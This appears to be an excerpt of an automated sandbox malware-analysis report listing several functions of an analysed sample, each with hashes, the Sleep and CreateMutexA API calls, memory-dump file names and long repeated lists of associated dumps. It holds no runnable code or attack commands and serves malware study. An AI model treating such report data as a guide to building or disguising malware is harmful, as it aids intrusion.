Instruction ID: ea9fb5fe641e402d4e2362f41d1798d9ad9043cdfa4381d7569ede9cd9955cb2
Opcode Fuzzy Hash: 9d2ec9289a2745463c7ec1e186bd8a9147d4b4bb7216f6a675c21bbca378a326
Instruction Fuzzy Hash: 88312331A002049BFB089B6CDD89B6DBBA2EBC1314F24C619E518D73D5E77699908B36

Function 00D7A1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00D7A963
CreateMutexA.KERNEL32(00000000,00000000,00DD3254), ref: 00D7A981

Memory Dump Source

Source File: 00000000.00000002.2105586602.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true

Associated: 00000000.00000002.2105569511.0000000000D70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105586602.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105646406.0000000000DD9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105663731.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105682169.0000000000DE5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105698429.0000000000DE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105714881.0000000000DE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105813544.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105833222.0000000000F3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105888900.0000000000F67000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105904997.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105921179.0000000000F6B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105936485.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105957705.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105977685.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105998213.0000000000F8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106013899.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106031477.0000000000F96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106054538.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106080073.0000000000FC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106096996.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106112679.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106132892.0000000000FCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106152353.0000000000FCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106171327.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106188633.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106205820.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106226415.0000000000FDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106242949.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106264393.0000000000FEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106281432.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106297488.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106314938.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106332734.0000000000FF4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106354979.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106372557.0000000001002000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106389176.0000000001005000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106409856.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106429895.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106452370.0000000001028000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.0000000001029000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.000000000104C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106524909.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106541217.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106558468.000000000107F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106576586.0000000001081000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106598192.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106615934.0000000001091000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d70000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 995f50bb512b1111f7682a8e6cffb49c5cbc60275870d02efb7800a284d65ecb
Instruction ID: 615bede145dc71f67e301b73b230877059982ba34544c8e83d8a8e322a6ab93f
Opcode Fuzzy Hash: 995f50bb512b1111f7682a8e6cffb49c5cbc60275870d02efb7800a284d65ecb
Instruction Fuzzy Hash: 97316A31A042049BFB089B7CDC89B5DBBA2EFC6310F248219E418D73D5E77599808736

Function 00D7A418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00D7A963
CreateMutexA.KERNEL32(00000000,00000000,00DD3254), ref: 00D7A981

Memory Dump Source

Source File: 00000000.00000002.2105586602.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true

Associated: 00000000.00000002.2105569511.0000000000D70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105586602.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105646406.0000000000DD9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105663731.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105682169.0000000000DE5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105698429.0000000000DE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105714881.0000000000DE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105813544.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105833222.0000000000F3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105888900.0000000000F67000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105904997.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105921179.0000000000F6B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105936485.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105957705.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105977685.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105998213.0000000000F8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106013899.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106031477.0000000000F96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106054538.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106080073.0000000000FC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106096996.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106112679.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106132892.0000000000FCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106152353.0000000000FCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106171327.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106188633.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106205820.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106226415.0000000000FDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106242949.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106264393.0000000000FEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106281432.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106297488.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106314938.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106332734.0000000000FF4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106354979.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106372557.0000000001002000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106389176.0000000001005000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106409856.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106429895.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106452370.0000000001028000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.0000000001029000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.000000000104C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106524909.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106541217.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106558468.000000000107F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106576586.0000000001081000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106598192.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106615934.0000000001091000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d70000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 228060d361cf200f1364fb1904b68f3a73695be164ab62b09b4c355e03d8ee2e
Instruction ID: 0c1ca0100a4da2cf22615a84868c66ffab50a304920dc0f9022330de11b30f6e
Opcode Fuzzy Hash: 228060d361cf200f1364fb1904b68f3a73695be164ab62b09b4c355e03d8ee2e
Instruction Fuzzy Hash: 25313B31A001049BEF089B7CDC89B6DB762EFC1314F248218E55CD73D5E77699808776

Function 00D7A54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00D7A963
CreateMutexA.KERNEL32(00000000,00000000,00DD3254), ref: 00D7A981

Memory Dump Source

Source File: 00000000.00000002.2105586602.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true

Associated: 00000000.00000002.2105569511.0000000000D70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105586602.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105646406.0000000000DD9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105663731.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105682169.0000000000DE5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105698429.0000000000DE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105714881.0000000000DE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105813544.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105833222.0000000000F3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105888900.0000000000F67000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105904997.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105921179.0000000000F6B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105936485.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105957705.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105977685.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105998213.0000000000F8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106013899.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106031477.0000000000F96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106054538.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106080073.0000000000FC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106096996.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106112679.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106132892.0000000000FCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106152353.0000000000FCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106171327.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106188633.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106205820.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106226415.0000000000FDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106242949.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106264393.0000000000FEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106281432.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106297488.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106314938.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106332734.0000000000FF4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106354979.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106372557.0000000001002000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106389176.0000000001005000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106409856.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106429895.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106452370.0000000001028000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.0000000001029000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.000000000104C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106524909.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106541217.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106558468.000000000107F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106576586.0000000001081000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106598192.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106615934.0000000001091000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d70000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 7dd4e4a0854bada1d1e6683e4bfc8d29170eef7792beef2afbcec5b8789389c9
Instruction ID: 4fa35660e3e8a06c7f58b617c8147979793f943fb595f4ec665072c72d43cbdd
Opcode Fuzzy Hash: 7dd4e4a0854bada1d1e6683e4bfc8d29170eef7792beef2afbcec5b8789389c9
Instruction Fuzzy Hash: B0313931A001048BEB08DB7CDC85B6DB762EFC1314F288218E558D73D5E77599909B36

Function 00D7A682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00D7A963
CreateMutexA.KERNEL32(00000000,00000000,00DD3254), ref: 00D7A981

Memory Dump Source

Source File: 00000000.00000002.2105586602.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true

Associated: 00000000.00000002.2105569511.0000000000D70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105586602.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105646406.0000000000DD9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105663731.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105682169.0000000000DE5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105698429.0000000000DE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105714881.0000000000DE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105813544.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105833222.0000000000F3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105888900.0000000000F67000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105904997.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105921179.0000000000F6B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105936485.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105957705.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105977685.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105998213.0000000000F8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106013899.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106031477.0000000000F96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106054538.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106080073.0000000000FC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106096996.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106112679.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106132892.0000000000FCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106152353.0000000000FCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106171327.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106188633.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106205820.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106226415.0000000000FDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106242949.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106264393.0000000000FEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106281432.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106297488.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106314938.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106332734.0000000000FF4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106354979.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106372557.0000000001002000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106389176.0000000001005000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106409856.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106429895.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106452370.0000000001028000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.0000000001029000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.000000000104C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106524909.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106541217.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106558468.000000000107F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106576586.0000000001081000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106598192.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106615934.0000000001091000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d70000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 4eb925953aa817991e4e4c30f3a61465e0834de1ac903933cf27a0cfab04a2ca
Instruction ID: 565e26f46abc3ff74376a0d1ec084b12e0ca0990ef2638f9e67d2ad516e6fcc1
Opcode Fuzzy Hash: 4eb925953aa817991e4e4c30f3a61465e0834de1ac903933cf27a0cfab04a2ca
Instruction Fuzzy Hash: D13128316002049BEB089B7CDC85B6DB7A2EFC1314F28C618E518D73D5E77599908B76

Function 00D79ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00D7A963
CreateMutexA.KERNEL32(00000000,00000000,00DD3254), ref: 00D7A981

Memory Dump Source

Source File: 00000000.00000002.2105586602.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true

Associated: 00000000.00000002.2105569511.0000000000D70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105586602.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105646406.0000000000DD9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105663731.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105682169.0000000000DE5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105698429.0000000000DE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105714881.0000000000DE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105813544.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105833222.0000000000F3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105888900.0000000000F67000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105904997.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105921179.0000000000F6B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105936485.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105957705.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105977685.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105998213.0000000000F8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106013899.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106031477.0000000000F96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106054538.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106080073.0000000000FC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106096996.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106112679.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106132892.0000000000FCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106152353.0000000000FCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106171327.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106188633.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106205820.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106226415.0000000000FDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106242949.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106264393.0000000000FEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106281432.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106297488.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106314938.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106332734.0000000000FF4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106354979.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106372557.0000000001002000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106389176.0000000001005000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106409856.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106429895.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106452370.0000000001028000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.0000000001029000.00000040.00000001.01000000.00000003.sdmpDownload File
